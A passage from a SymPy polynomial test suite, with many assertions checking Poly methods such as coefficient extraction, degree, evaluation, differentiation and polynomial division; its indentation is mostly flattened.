assert Poly(2*x + 1, domain='ZZ').to_ring() == Poly(2*x + 1, domain='ZZ')
assert Poly(2*x + 1, domain='QQ').to_ring() == Poly(2*x + 1, domain='ZZ')
raises(CoercionFailed, lambda: Poly(x/2 + 1).to_ring())
raises(DomainError, lambda: Poly(2*x + 1, modulus=3).to_ring())
def test_Poly_to_field():
assert Poly(2*x + 1, domain='ZZ').to_field() == Poly(2*x + 1, domain='QQ')
assert Poly(2*x + 1, domain='QQ').to_field() == Poly(2*x + 1, domain='QQ')
assert Poly(x/2 + 1, domain='QQ').to_field() == Poly(x/2 + 1, domain='QQ')
assert Poly(2*x + 1, modulus=3).to_field() == Poly(2*x + 1, modulus=3)
assert Poly(2.0*x + 1.0).to_field() == Poly(2.0*x + 1.0)
def test_Poly_to_exact():
assert Poly(2*x).to_exact() == Poly(2*x)
assert Poly(x/2).to_exact() == Poly(x/2)
assert Poly(0.1*x).to_exact() == Poly(x/10)
def test_Poly_retract():
f = Poly(x**2 + 1, x, domain=QQ[y])
assert f.retract() == Poly(x**2 + 1, x, domain='ZZ')
assert f.retract(field=True) == Poly(x**2 + 1, x, domain='QQ')
assert Poly(0, x, y).retract() == Poly(0, x, y)
def test_Poly_slice():
f = Poly(x**3 + 2*x**2 + 3*x + 4)
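    # slice(m, n) keeps only the terms whose degree k satisfies m <= k < n.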
assert f.slice(0, 0) == Poly(0, x)
assert f.slice(0, 1) == Poly(4, x)
assert f.slice(0, 2) == Poly(3*x + 4, x)
assert f.slice(0, 3) == Poly(2*x**2 + 3*x + 4, x)
assert f.slice(0, 4) == Poly(x**3 + 2*x**2 + 3*x + 4, x)
assert f.slice(x, 0, 0) == Poly(0, x)
assert f.slice(x, 0, 1) == Poly(4, x)
assert f.slice(x, 0, 2) == Poly(3*x + 4, x)
assert f.slice(x, 0, 3) == Poly(2*x**2 + 3*x + 4, x)
assert f.slice(x, 0, 4) == Poly(x**3 + 2*x**2 + 3*x + 4, x)
def test_Poly_coeffs():
assert Poly(0, x).coeffs() == [0]
assert Poly(1, x).coeffs() == [1]
assert Poly(2*x + 1, x).coeffs() == [2, 1]
assert Poly(7*x**2 + 2*x + 1, x).coeffs() == [7, 2, 1]
assert Poly(7*x**4 + 2*x + 1, x).coeffs() == [7, 2, 1]
assert Poly(x*y**7 + 2*x**2*y**3).coeffs('lex') == [2, 1]
assert Poly(x*y**7 + 2*x**2*y**3).coeffs('grlex') == [1, 2]
def test_Poly_monoms():
assert Poly(0, x).monoms() == [(0,)]
assert Poly(1, x).monoms() == [(0,)]
assert Poly(2*x + 1, x).monoms() == [(1,), (0,)]
assert Poly(7*x**2 + 2*x + 1, x).monoms() == [(2,), (1,), (0,)]
assert Poly(7*x**4 + 2*x + 1, x).monoms() == [(4,), (1,), (0,)]
assert Poly(x*y**7 + 2*x**2*y**3).monoms('lex') == [(2, 3), (1, 7)]
assert Poly(x*y**7 + 2*x**2*y**3).monoms('grlex') == [(1, 7), (2, 3)]
def test_Poly_terms():
assert Poly(0, x).terms() == [((0,), 0)]
assert Poly(1, x).terms() == [((0,), 1)]
assert Poly(2*x + 1, x).terms() == [((1,), 2), ((0,), 1)]
assert Poly(7*x**2 + 2*x + 1, x).terms() == [((2,), 7), ((1,), 2), ((0,), 1)]
assert Poly(7*x**4 + 2*x + 1, x).terms() == [((4,), 7), ((1,), 2), ((0,), 1)]
assert Poly(
x*y**7 + 2*x**2*y**3).terms('lex') == [((2, 3), 2), ((1, 7), 1)]
assert Poly(
x*y**7 + 2*x**2*y**3).terms('grlex') == [((1, 7), 1), ((2, 3), 2)]
def test_Poly_all_coeffs():
assert Poly(0, x).all_coeffs() == [0]
assert Poly(1, x).all_coeffs() == [1]
assert Poly(2*x + 1, x).all_coeffs() == [2, 1]
assert Poly(7*x**2 + 2*x + 1, x).all_coeffs() == [7, 2, 1]
assert Poly(7*x**4 + 2*x + 1, x).all_coeffs() == [7, 0, 0, 2, 1]
def test_Poly_all_monoms():
assert Poly(0, x).all_monoms() == [(0,)]
assert Poly(1, x).all_monoms() == [(0,)]
assert Poly(2*x + 1, x).all_monoms() == [(1,), (0,)]
assert Poly(7*x**2 + 2*x + 1, x).all_monoms() == [(2,), (1,), (0,)]
assert Poly(7*x**4 + 2*x + 1, x).all_monoms() == [(4,), (3,), (2,), (1,), (0,)]
def test_Poly_all_terms():
assert Poly(0, x).all_terms() == [((0,), 0)]
assert Poly(1, x).all_terms() == [((0,), 1)]
assert Poly(2*x + 1, x).all_terms() == [((1,), 2), ((0,), 1)]
assert Poly(7*x**2 + 2*x + 1, x).all_terms() == \
[((2,), 7), ((1,), 2), ((0,), 1)]
assert Poly(7*x**4 + 2*x + 1, x).all_terms() == \
[((4,), 7), ((3,), 0), ((2,), 0), ((1,), 2), ((0,), 1)]
def test_Poly_termwise():
f = Poly(x**2 + 20*x + 400)
g = Poly(x**2 + 2*x + 4)
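    # termwise(func) maps func over all (monom, coeff) pairs; func may return
    # either a new coefficient or a new (monom, coeff) pair.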
def func(monom, coeff):
(k,) = monom
return coeff//10**(2 - k)
assert f.termwise(func) == g
def func(monom, coeff):
(k,) = monom
return (k,), coeff//10**(2 - k)
assert f.termwise(func) == g
def test_Poly_length():
assert Poly(0, x).length() == 0
assert Poly(1, x).length() == 1
assert Poly(x, x).length() == 1
assert Poly(x + 1, x).length() == 2
assert Poly(x**2 + 1, x).length() == 2
assert Poly(x**2 + x + 1, x).length() == 3
def test_Poly_as_dict():
assert Poly(0, x).as_dict() == {}
assert Poly(0, x, y, z).as_dict() == {}
assert Poly(1, x).as_dict() == {(0,): 1}
assert Poly(1, x, y, z).as_dict() == {(0, 0, 0): 1}
assert Poly(x**2 + 3, x).as_dict() == {(2,): 1, (0,): 3}
assert Poly(x**2 + 3, x, y, z).as_dict() == {(2, 0, 0): 1, (0, 0, 0): 3}
assert Poly(3*x**2*y*z**3 + 4*x*y + 5*x*z).as_dict() == {(2, 1, 3): 3,
(1, 1, 0): 4, (1, 0, 1): 5}
def test_Poly_as_expr():
assert Poly(0, x).as_expr() == 0
assert Poly(0, x, y, z).as_expr() == 0
assert Poly(1, x).as_expr() == 1
assert Poly(1, x, y, z).as_expr() == 1
assert Poly(x**2 + 3, x).as_expr() == x**2 + 3
assert Poly(x**2 + 3, x, y, z).as_expr() == x**2 + 3
assert Poly(
3*x**2*y*z**3 + 4*x*y + 5*x*z).as_expr() == 3*x**2*y*z**3 + 4*x*y + 5*x*z
f = Poly(x**2 + 2*x*y**2 - y, x, y)
assert f.as_expr() == -y + x**2 + 2*x*y**2
assert f.as_expr({x: 5}) == 25 - y + 10*y**2
assert f.as_expr({y: 6}) == -6 + 72*x + x**2
assert f.as_expr({x: 5, y: 6}) == 379
assert f.as_expr(5, 6) == 379
raises(GeneratorsError, lambda: f.as_expr({z: 7}))
def test_Poly_lift():
assert Poly(x**4 - I*x + 17*I, x, gaussian=True).lift() == \
Poly(x**16 + 2*x**10 + 578*x**8 + x**4 - 578*x**2 + 83521,
x, domain='QQ')
def test_Poly_deflate():
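    # deflate() extracts the largest exponents (m1, ..., mn) such that
    # f(x1, ..., xn) == g(x1**m1, ..., xn**mn) and returns them together with g.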
assert Poly(0, x).deflate() == ((1,), Poly(0, x))
assert Poly(1, x).deflate() == ((1,), Poly(1, x))
assert Poly(x, x).deflate() == ((1,), Poly(x, x))
assert Poly(x**2, x).deflate() == ((2,), Poly(x, x))
assert Poly(x**17, x).deflate() == ((17,), Poly(x, x))
assert Poly(
x**2*y*z**11 + x**4*z**11).deflate() == ((2, 1, 11), Poly(x*y*z + x**2*z))
def test_Poly_inject():
f = Poly(x**2*y + x*y**3 + x*y + 1, x)
assert f.inject() == Poly(x**2*y + x*y**3 + x*y + 1, x, y)
assert f.inject(front=True) == Poly(y**3*x + y*x**2 + y*x + 1, y, x)
def test_Poly_eject():
f = Poly(x**2*y + x*y**3 + x*y + 1, x, y)
assert f.eject(x) == Poly(x*y**3 + (x**2 + x)*y + 1, y, domain='ZZ[x]')
assert f.eject(y) == Poly(y*x**2 + (y**3 + y)*x + 1, x, domain='ZZ[y]')
ex = x + y + z + t + w
g = Poly(ex, x, y, z, t, w)
assert g.eject(x) == Poly(ex, y, z, t, w, domain='ZZ[x]')
assert g.eject(x, y) == Poly(ex, z, t, w, domain='ZZ[x, y]')
assert g.eject(x, y, z) == Poly(ex, t, w, domain='ZZ[x, y, z]')
assert g.eject(w) == Poly(ex, x, y, z, t, domain='ZZ[w]')
assert g.eject(t, w) == Poly(ex, x, y, z, domain='ZZ[w, t]')
assert g.eject(z, t, w) == Poly(ex, x, y, domain='ZZ[w, t, z]')
raises(DomainError, lambda: Poly(x*y, x, y, domain=ZZ[z]).eject(y))
raises(NotImplementedError, lambda: Poly(x*y, x, y, z).eject(y))
def test_Poly_exclude():
assert Poly(x, x, y).exclude() == Poly(x, x)
assert Poly(x*y, x, y).exclude() == Poly(x*y, x, y)
assert Poly(1, x, y).exclude() == Poly(1, x, y)
def test_Poly__gen_to_level():
assert Poly(1, x, y)._gen_to_level(-2) == 0
assert Poly(1, x, y)._gen_to_level(-1) == 1
assert Poly(1, x, y)._gen_to_level( 0) == 0
assert Poly(1, x, y)._gen_to_level( 1) == 1
raises(PolynomialError, lambda: Poly(1, x, y)._gen_to_level(-3))
raises(PolynomialError, lambda: Poly(1, x, y)._gen_to_level( 2))
assert Poly(1, x, y)._gen_to_level(x) == 0
assert Poly(1, x, y)._gen_to_level(y) == 1
assert Poly(1, x, y)._gen_to_level('x') == 0
assert Poly(1, x, y)._gen_to_level('y') == 1
raises(PolynomialError, lambda: Poly(1, x, y)._gen_to_level(z))
raises(PolynomialError, lambda: Poly(1, x, y)._gen_to_level('z'))
def test_Poly_degree():
assert Poly(0, x).degree() == -oo
assert Poly(1, x).degree() == 0
assert Poly(x, x).degree() == 1
assert Poly(0, x).degree(gen=0) == -oo
assert Poly(1, x).degree(gen=0) == 0
assert Poly(x, x).degree(gen=0) == 1
assert Poly(0, x).degree(gen=x) == -oo
assert Poly(1, x).degree(gen=x) == 0
assert Poly(x, x).degree(gen=x) == 1
assert Poly(0, x).degree(gen='x') == -oo
assert Poly(1, x).degree(gen='x') == 0
assert Poly(x, x).degree(gen='x') == 1
raises(PolynomialError, lambda: Poly(1, x).degree(gen=1))
raises(PolynomialError, lambda: Poly(1, x).degree(gen=y))
raises(PolynomialError, lambda: Poly(1, x).degree(gen='y'))
assert Poly(1, x, y).degree() == 0
assert Poly(2*y, x, y).degree() == 0
assert Poly(x*y, x, y).degree() == 1
assert Poly(1, x, y).degree(gen=x) == 0
assert Poly(2*y, x, y).degree(gen=x) == 0
assert Poly(x*y, x, y).degree(gen=x) == 1
assert Poly(1, x, y).degree(gen=y) == 0
assert Poly(2*y, x, y).degree(gen=y) == 1
assert Poly(x*y, x, y).degree(gen=y) == 1
assert degree(1, x) == 0
assert degree(x, x) == 1
assert degree(x*y**2, gen=x) == 1
assert degree(x*y**2, gen=y) == 2
assert degree(x*y**2, x, y) == 1
assert degree(x*y**2, y, x) == 2
raises(ComputationFailed, lambda: degree(1))
def test_Poly_degree_list():
assert Poly(0, x).degree_list() == (-oo,)
assert Poly(0, x, y).degree_list() == (-oo, -oo)
assert Poly(0, x, y, z).degree_list() == (-oo, -oo, -oo)
assert Poly(1, x).degree_list() == (0,)
assert Poly(1, x, y).degree_list() == (0, 0)
assert Poly(1, x, y, z).degree_list() == (0, 0, 0)
assert Poly(x**2*y + x**3*z**2 + 1).degree_list() == (3, 1, 2)
assert degree_list(1, x) == (0,)
assert degree_list(x, x) == (1,)
assert degree_list(x*y**2) == (1, 2)
raises(ComputationFailed, lambda: degree_list(1))
def test_Poly_total_degree():
assert Poly(x**2*y + x**3*z**2 + 1).total_degree() == 5
assert Poly(x**2 + z**3).total_degree() == 3
assert Poly(x*y*z + z**4).total_degree() == 4
assert Poly(x**3 + x + 1).total_degree() == 3
def test_Poly_homogenize():
    assert Poly(x**2 + y).homogenize(z) == Poly(x**2 + y*z)
    assert Poly(x + y).homogenize(z) == Poly(x + y, x, y, z)
    assert Poly(x + y**2).homogenize(y) == Poly(x*y + y**2)
def test_Poly_homogeneous_order():
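    # homogeneous_order() is the common total degree of all monomials,
    # or None if the polynomial is not homogeneous.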
assert Poly(0, x, y).homogeneous_order() == -oo
assert Poly(1, x, y).homogeneous_order() == 0
assert Poly(x, x, y).homogeneous_order() == 1
assert Poly(x*y, x, y).homogeneous_order() == 2
assert Poly(x + 1, x, y).homogeneous_order() is None
assert Poly(x*y + x, x, y).homogeneous_order() is None
assert Poly(x**5 + 2*x**3*y**2 + 9*x*y**4).homogeneous_order() == 5
assert Poly(x**5 + 2*x**3*y**3 + 9*x*y**4).homogeneous_order() is None
def test_Poly_LC():
assert Poly(0, x).LC() == 0
assert Poly(1, x).LC() == 1
assert Poly(2*x**2 + x, x).LC() == 2
assert Poly(x*y**7 + 2*x**2*y**3).LC('lex') == 2
assert Poly(x*y**7 + 2*x**2*y**3).LC('grlex') == 1
assert LC(x*y**7 + 2*x**2*y**3, order='lex') == 2
assert LC(x*y**7 + 2*x**2*y**3, order='grlex') == 1
def test_Poly_TC():
assert Poly(0, x).TC() == 0
assert Poly(1, x).TC() == 1
assert Poly(2*x**2 + x, x).TC() == 0
def test_Poly_EC():
assert Poly(0, x).EC() == 0
assert Poly(1, x).EC() == 1
assert Poly(2*x**2 + x, x).EC() == 1
assert Poly(x*y**7 + 2*x**2*y**3).EC('lex') == 1
assert Poly(x*y**7 + 2*x**2*y**3).EC('grlex') == 2
def test_Poly_coeff():
assert Poly(0, x).coeff_monomial(1) == 0
assert Poly(0, x).coeff_monomial(x) == 0
assert Poly(1, x).coeff_monomial(1) == 1
assert Poly(1, x).coeff_monomial(x) == 0
assert Poly(x**8, x).coeff_monomial(1) == 0
assert Poly(x**8, x).coeff_monomial(x**7) == 0
assert Poly(x**8, x).coeff_monomial(x**8) == 1
assert Poly(x**8, x).coeff_monomial(x**9) == 0
assert Poly(3*x*y**2 + 1, x, y).coeff_monomial(1) == 1
assert Poly(3*x*y**2 + 1, x, y).coeff_monomial(x*y**2) == 3
p = Poly(24*x*y*exp(8) + 23*x, x, y)
assert p.coeff_monomial(x) == 23
assert p.coeff_monomial(y) == 0
assert p.coeff_monomial(x*y) == 24*exp(8)
assert p.as_expr().coeff(x) == 24*y*exp(8) + 23
raises(NotImplementedError, lambda: p.coeff(x))
raises(ValueError, lambda: Poly(x + 1).coeff_monomial(0))
raises(ValueError, lambda: Poly(x + 1).coeff_monomial(3*x))
raises(ValueError, lambda: Poly(x + 1).coeff_monomial(3*x*y))
def test_Poly_nth():
assert Poly(0, x).nth(0) == 0
assert Poly(0, x).nth(1) == 0
assert Poly(1, x).nth(0) == 1
assert Poly(1, x).nth(1) == 0
assert Poly(x**8, x).nth(0) == 0
assert Poly(x**8, x).nth(7) == 0
assert Poly(x**8, x).nth(8) == 1
assert Poly(x**8, x).nth(9) == 0
assert Poly(3*x*y**2 + 1, x, y).nth(0, 0) == 1
assert Poly(3*x*y**2 + 1, x, y).nth(1, 2) == 3
raises(ValueError, lambda: Poly(x*y + 1, x, y).nth(1))
def test_Poly_LM():
assert Poly(0, x).LM() == (0,)
assert Poly(1, x).LM() == (0,)
assert Poly(2*x**2 + x, x).LM() == (2,)
assert Poly(x*y**7 + 2*x**2*y**3).LM('lex') == (2, 3)
assert Poly(x*y**7 + 2*x**2*y**3).LM('grlex') == (1, 7)
assert LM(x*y**7 + 2*x**2*y**3, order='lex') == x**2*y**3
assert LM(x*y**7 + 2*x**2*y**3, order='grlex') == x*y**7
def test_Poly_LM_custom_order():
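    # The order argument can also be a callable, used as a sort key on exponent tuples.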
f = Poly(x**2*y**3*z + x**2*y*z**3 + x*y*z + 1)
rev_lex = lambda monom: tuple(reversed(monom))
assert f.LM(order='lex') == (2, 3, 1)
assert f.LM(order=rev_lex) == (2, 1, 3)
def test_Poly_EM():
assert Poly(0, x).EM() == (0,)
assert Poly(1, x).EM() == (0,)
assert Poly(2*x**2 + x, x).EM() == (1,)
assert Poly(x*y**7 + 2*x**2*y**3).EM('lex') == (1, 7)
assert Poly(x*y**7 + 2*x**2*y**3).EM('grlex') == (2, 3)
def test_Poly_LT():
assert Poly(0, x).LT() == ((0,), 0)
assert Poly(1, x).LT() == ((0,), 1)
assert Poly(2*x**2 + x, x).LT() == ((2,), 2)
assert Poly(x*y**7 + 2*x**2*y**3).LT('lex') == ((2, 3), 2)
assert Poly(x*y**7 + 2*x**2*y**3).LT('grlex') == ((1, 7), 1)
assert LT(x*y**7 + 2*x**2*y**3, order='lex') == 2*x**2*y**3
assert LT(x*y**7 + 2*x**2*y**3, order='grlex') == x*y**7
def test_Poly_ET():
assert Poly(0, x).ET() == ((0,), 0)
assert Poly(1, x).ET() == ((0,), 1)
assert Poly(2*x**2 + x, x).ET() == ((1,), 1)
assert Poly(x*y**7 + 2*x**2*y**3).ET('lex') == ((1, 7), 1)
assert Poly(x*y**7 + 2*x**2*y**3).ET('grlex') == ((2, 3), 2)
def test_Poly_max_norm():
assert Poly(-1, x).max_norm() == 1
assert Poly( 0, x).max_norm() == 0
assert Poly( 1, x).max_norm() == 1
def test_Poly_l1_norm():
assert Poly(-1, x).l1_norm() == 1
assert Poly( 0, x).l1_norm() == 0
assert Poly( 1, x).l1_norm() == 1
def test_Poly_clear_denoms():
coeff, poly = Poly(x + 2, x).clear_denoms()
assert coeff == 1 and poly == Poly(
x + 2, x, domain='ZZ') and poly.get_domain() == ZZ
coeff, poly = Poly(x/2 + 1, x).clear_denoms()
assert coeff == 2 and poly == Poly(
x + 2, x, domain='QQ') and poly.get_domain() == QQ
coeff, poly = Poly(x/2 + 1, x).clear_denoms(convert=True)
assert coeff == 2 and poly == Poly(
x + 2, x, domain='ZZ') and poly.get_domain() == ZZ
coeff, poly = Poly(x/y + 1, x).clear_denoms(convert=True)
assert coeff == y and poly == Poly(
x + y, x, domain='ZZ[y]') and poly.get_domain() == ZZ[y]
coeff, poly = Poly(x/3 + sqrt(2), x, domain='EX').clear_denoms()
assert coeff == 3 and poly == Poly(
x + 3*sqrt(2), x, domain='EX') and poly.get_domain() == EX
coeff, poly = Poly(
x/3 + sqrt(2), x, domain='EX').clear_denoms(convert=True)
assert coeff == 3 and poly == Poly(
x + 3*sqrt(2), x, domain='EX') and poly.get_domain() == EX
def test_Poly_rat_clear_denoms():
f = Poly(x**2/y + 1, x)
g = Poly(x**3 + y, x)
assert f.rat_clear_denoms(g) == \
(Poly(x**2 + y, x), Poly(y*x**3 + y**2, x))
f = f.set_domain(EX)
g = g.set_domain(EX)
assert f.rat_clear_denoms(g) == (f, g)
def test_Poly_integrate():
assert Poly(x + 1).integrate() == Poly(x**2/2 + x)
assert Poly(x + 1).integrate(x) == Poly(x**2/2 + x)
assert Poly(x + 1).integrate((x, 1)) == Poly(x**2/2 + x)
assert Poly(x*y + 1).integrate(x) == Poly(x**2*y/2 + x)
assert Poly(x*y + 1).integrate(y) == Poly(x*y**2/2 + y)
assert Poly(x*y + 1).integrate(x, x) == Poly(x**3*y/6 + x**2/2)
assert Poly(x*y + 1).integrate(y, y) == Poly(x*y**3/6 + y**2/2)
assert Poly(x*y + 1).integrate((x, 2)) == Poly(x**3*y/6 + x**2/2)
assert Poly(x*y + 1).integrate((y, 2)) == Poly(x*y**3/6 + y**2/2)
assert Poly(x*y + 1).integrate(x, y) == Poly(x**2*y**2/4 + x*y)
assert Poly(x*y + 1).integrate(y, x) == Poly(x**2*y**2/4 + x*y)
def test_Poly_diff():
assert Poly(x**2 + x).diff() == Poly(2*x + 1)
assert Poly(x**2 + x).diff(x) == Poly(2*x + 1)
assert Poly(x**2 + x).diff((x, 1)) == Poly(2*x + 1)
assert Poly(x**2*y**2 + x*y).diff(x) == Poly(2*x*y**2 + y)
assert Poly(x**2*y**2 + x*y).diff(y) == Poly(2*x**2*y + x)
assert Poly(x**2*y**2 + x*y).diff(x, x) == Poly(2*y**2, x, y)
assert Poly(x**2*y**2 + x*y).diff(y, y) == Poly(2*x**2, x, y)
assert Poly(x**2*y**2 + x*y).diff((x, 2)) == Poly(2*y**2, x, y)
assert Poly(x**2*y**2 + x*y).diff((y, 2)) == Poly(2*x**2, x, y)
assert Poly(x**2*y**2 + x*y).diff(x, y) == Poly(4*x*y + 1)
assert Poly(x**2*y**2 + x*y).diff(y, x) == Poly(4*x*y + 1)
def test_Poly_eval():
assert Poly(0, x).eval(7) == 0
assert Poly(1, x).eval(7) == 1
assert Poly(x, x).eval(7) == 7
assert Poly(0, x).eval(0, 7) == 0
assert Poly(1, x).eval(0, 7) == 1
assert Poly(x, x).eval(0, 7) == 7
assert Poly(0, x).eval(x, 7) == 0
assert Poly(1, x).eval(x, 7) == 1
assert Poly(x, x).eval(x, 7) == 7
assert Poly(0, x).eval('x', 7) == 0
assert Poly(1, x).eval('x', 7) == 1
assert Poly(x, x).eval('x', 7) == 7
raises(PolynomialError, lambda: Poly(1, x).eval(1, 7))
raises(PolynomialError, lambda: Poly(1, x).eval(y, 7))
raises(PolynomialError, lambda: Poly(1, x).eval('y', 7))
assert Poly(123, x, y).eval(7) == Poly(123, y)
assert Poly(2*y, x, y).eval(7) == Poly(2*y, y)
assert Poly(x*y, x, y).eval(7) == Poly(7*y, y)
assert Poly(123, x, y).eval(x, 7) == Poly(123, y)
assert Poly(2*y, x, y).eval(x, 7) == Poly(2*y, y)
assert Poly(x*y, x, y).eval(x, 7) == Poly(7*y, y)
assert Poly(123, x, y).eval(y, 7) == Poly(123, x)
assert Poly(2*y, x, y).eval(y, 7) == Poly(14, x)
assert Poly(x*y, x, y).eval(y, 7) == Poly(7*x, x)
assert Poly(x*y + y, x, y).eval({x: 7}) == Poly(8*y, y)
assert Poly(x*y + y, x, y).eval({y: 7}) == Poly(7*x + 7, x)
assert Poly(x*y + y, x, y).eval({x: 6, y: 7}) == 49
assert Poly(x*y + y, x, y).eval({x: 7, y: 6}) == 48
assert Poly(x*y + y, x, y).eval((6, 7)) == 49
assert Poly(x*y + y, x, y).eval([6, 7]) == 49
assert Poly(x + 1, domain='ZZ').eval(S(1)/2) == S(3)/2
assert Poly(x + 1, domain='ZZ').eval(sqrt(2)) == sqrt(2) + 1
raises(ValueError, lambda: Poly(x*y + y, x, y).eval((6, 7, 8)))
raises(DomainError, lambda: Poly(x + 1, domain='ZZ').eval(S(1)/2, auto=False))
# issue 6344
alpha = Symbol('alpha')
result = (2*alpha*z - 2*alpha + z**2 + 3)/(z**2 - 2*z + 1)
f = Poly(x**2 + (alpha - 1)*x - alpha + 1, x, domain='ZZ[alpha]')
assert f.eval((z + 1)/(z - 1)) == result
g = Poly(x**2 + (alpha - 1)*x - alpha + 1, x, y, domain='ZZ[alpha]')
assert g.eval((z + 1)/(z - 1)) == Poly(result, y, domain='ZZ(alpha,z)')
def test_Poly___call__():
f = Poly(2*x*y + 3*x + y + 2*z)
assert f(2) == Poly(5*y + 2*z + 6)
assert f(2, 5) == Poly(2*z + 31)
assert f(2, 5, 7) == 45
def test_parallel_poly_from_expr():
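    # parallel_poly_from_expr puts all inputs over a common set of generators and a common domain.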
assert parallel_poly_from_expr(
[x - 1, x**2 - 1], x)[0] == [Poly(x - 1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr(
[Poly(x - 1, x), x**2 - 1], x)[0] == [Poly(x - 1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr(
[x - 1, Poly(x**2 - 1, x)], x)[0] == [Poly(x - 1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr([Poly(
x - 1, x), Poly(x**2 - 1, x)], x)[0] == [Poly(x - 1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr(
[x - 1, x**2 - 1], x, y)[0] == [Poly(x - 1, x, y), Poly(x**2 - 1, x, y)]
assert parallel_poly_from_expr([Poly(
x - 1, x), x**2 - 1], x, y)[0] == [Poly(x - 1, x, y), Poly(x**2 - 1, x, y)]
assert parallel_poly_from_expr([x - 1, Poly(
x**2 - 1, x)], x, y)[0] == [Poly(x - 1, x, y), Poly(x**2 - 1, x, y)]
assert parallel_poly_from_expr([Poly(x - 1, x), Poly(
x**2 - 1, x)], x, y)[0] == [Poly(x - 1, x, y), Poly(x**2 - 1, x, y)]
assert parallel_poly_from_expr(
[x - 1, x**2 - 1])[0] == [Poly(x - 1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr(
[Poly(x - 1, x), x**2 - 1])[0] == [Poly(x - 1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr(
[x - 1, Poly(x**2 - 1, x)])[0] == [Poly(x - 1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr(
[Poly(x - 1, x), Poly(x**2 - 1, x)])[0] == [Poly(x - 1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr(
[1, x**2 - 1])[0] == [Poly(1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr(
[1, x**2 - 1])[0] == [Poly(1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr(
[1, Poly(x**2 - 1, x)])[0] == [Poly(1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr(
[1, Poly(x**2 - 1, x)])[0] == [Poly(1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr(
[x**2 - 1, 1])[0] == [Poly(x**2 - 1, x), Poly(1, x)]
assert parallel_poly_from_expr(
[x**2 - 1, 1])[0] == [Poly(x**2 - 1, x), Poly(1, x)]
assert parallel_poly_from_expr(
[Poly(x**2 - 1, x), 1])[0] == [Poly(x**2 - 1, x), Poly(1, x)]
assert parallel_poly_from_expr(
[Poly(x**2 - 1, x), 1])[0] == [Poly(x**2 - 1, x), Poly(1, x)]
assert parallel_poly_from_expr([Poly(x, x, y), Poly(y, x, y)], x, y, order='lex')[0] == \
[Poly(x, x, y, domain='ZZ'), Poly(y, x, y, domain='ZZ')]
raises(PolificationFailed, lambda: parallel_poly_from_expr([0, 1]))
def test_pdiv():
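    # pdiv/prem/pquo/pexquo perform pseudo-division, which avoids leaving the coefficient ring.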
f, g = x**2 - y**2, x - y
q, r = x + y, 0
F, G, Q, R = [ Poly(h, x, y) for h in (f, g, q, r) ]
assert F.pdiv(G) == (Q, R)
assert F.prem(G) == R
assert F.pquo(G) == Q
assert F.pexquo(G) == Q
assert pdiv(f, g) == (q, r)
assert prem(f, g) == r
assert pquo(f, g) == q
assert pexquo(f, g) == q
assert pdiv(f, g, x, y) == (q, r)
assert prem(f, g, x, y) == r
assert pquo(f, g, x, y) == q
assert pexquo(f, g, x, y) == q
assert pdiv(f, g, (x, y)) == (q, r)
assert prem(f, g, (x, y)) == r
assert pquo(f, g, (x, y)) == q
assert pexquo(f, g, (x, y)) == q
assert pdiv(F, G) == (Q, R)
assert prem(F, G) == R
assert pquo(F, G) == Q
assert pexquo(F, G) == Q
assert pdiv(f, g, polys=True) == (Q, R)
assert prem(f, g, polys=True) == R
assert pquo(f, g, polys=True) == Q
assert pexquo(f, g, polys=True) == Q
assert pdiv(F, G, polys=False) == (q, r)
assert prem(F, G, polys=False) == r
assert pquo(F, G, polys=False) == q
assert pexquo(F, G, polys=False) == q
raises(ComputationFailed, lambda: pdiv(4, 2))
raises(ComputationFailed, lambda: prem(4, 2))
raises(ComputationFailed, lambda: pquo(4, 2))
raises(ComputationFailed, lambda: pexquo(4, 2))
def test_div():
f, g = x**2 - y**2, x - y
q, r = x + y, 0
F, G, Q, R = [ Poly(h, x, y) for h in (f, g, q, r) ]
assert F.div(G) == (Q, R)
assert F.rem(G) == R
assert F.quo(G) == Q
assert F.exquo(G) == Q
assert div(f, g) == (q, r)
assert rem(f, g) == r
assert quo(f, g) == q
assert exquo(f, g) == q
assert div(f, g, x, y) == (q, r)
assert rem(f, g, x, y) == r
assert quo(f, g, x, y) == q
assert exquo(f, g, x, y) == q
assert div(f, g, (x, y)) == (q, r)
assert rem(f, g, (x, y)) == r
assert quo(f, g, (x, y)) == q
assert exquo(f, g, (x, y)) == q
assert div(F, G) == (Q, R)
assert rem(F, G) == R
assert quo(F, G) == Q
assert exquo(F, G) == Q
assert div(f, g, polys=True) == (Q, R)
assert rem(f, g, polys=True) == R
assert quo(f, g, polys=True) == Q
assert exquo(f, g, polys=True) == Q
assert div(F, G, polys=False) == (q, r)
assert rem(F, G, polys=False) == r
assert quo(F, G, polys=False) == q
assert exquo(F, G, polys=False) == q
raises(ComputationFailed, lambda: div(4, 2))
raises(ComputationFailed, lambda: rem(4, 2))
raises(ComputationFailed, lambda: quo(4, 2))
raises(ComputationFailed, lambda: exquo(4, 2))
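    # With auto=True (the default) ZZ coefficients are coerced to QQ so the division
    # succeeds; auto=False or domain=ZZ keeps ring division.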
f, g = x**2 + 1, 2*x - 4
qz, rz = 0, x**2 + 1
qq, rq = x/2 + 1, 5
assert div(f, g) == (qq, rq)
assert div(f, g, auto=True) == (qq, rq)
assert div(f, g, auto=False) == (qz, rz)
assert div(f, g, domain=ZZ) == (qz, rz)
assert div(f, g, domain=QQ) == (qq, rq)
assert div(f, g, domain=ZZ, auto=True) == (qq, rq)
assert div(f, g, domain=ZZ, auto=False) == (qz, rz)
assert div(f, g, domain=QQ, auto=True) == (qq, rq)
assert div(f, g, domain=QQ, auto=False) == (qq, rq)
assert rem(f, g) == rq
assert rem(f, g, auto=True) == rq
assert rem(f, g, auto=False) == rz
assert rem(f, g, domain=ZZ) == rz
assert rem(f, g, domain=QQ) == rq
assert rem(f, g, domain=ZZ, auto=True) == rq
assert rem(f, g, domain=ZZ, auto=False) == rz
assert rem(f, g, domain=QQ, auto=True) == rq
assert rem(f, g, domain=QQ, auto=False) == rq
assert quo(f, g) == qq
assert quo(f, g, auto=True) == qq
assert quo(f, g, auto=False) == qz
